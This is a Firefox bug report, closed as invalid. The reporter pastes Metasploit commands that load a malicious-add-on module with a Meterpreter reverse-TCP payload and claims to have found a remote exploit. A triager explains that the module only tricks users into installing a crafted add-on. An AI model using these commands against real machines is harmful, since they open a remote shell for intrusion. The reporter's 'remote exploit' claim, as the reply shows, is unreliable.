Closed
Bug 788033
Opened 12 years ago
Closed 12 years ago
Firefox Addon Bootstrap Exploit
Categories
(Firefox :: Untriaged, defect)
Tracking
()
RESOLVED
INVALID
People
(Reporter: skiller.rs1, Unassigned)
Details
Attachments
(1 file)
103.12 KB,
image/png
|
Details |
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0 Build ID: 20120824154833 Steps to reproduce: Pentesting in Backtrack 5 R3 and found a huge remote exploit in Firefox. Code: msf>use exploit/multi/browser/firefox_xpi_bootstrapped_addon msf>set payload windows/meterpreter/reverse_tcp msf>set lport 81 msf> set lhost 0.0.0.0 msf> set srvhost yourip msf> show targets Id Name -- ---- 0 Generic (Java Payload) 1 Windows x86 (Native Payload) 2 Linux x86 (Native Payload) 3 Mac OS X PPC (Native Payload) 4 Mac OS X x86 (Native Payload) msf> set target 1 msf > exploit Actual results: I was able to gain remote access to a PC, and was able to install malicious software if it was for malicious intentions. Expected results: The exploit shouldn't have existed in the first place.
this is not security sensitive this is a module that creates a malicious xpi that is an attempt to get the user to install a crafted add-on since add-ons can have chrome privileges they can do just about anything
Group: core-security
Status: UNCONFIRMED → RESOLVED
Closed: 12 years ago
Resolution: --- → INVALID
You need to log in
before you can comment on or make changes to this bug.
Description
•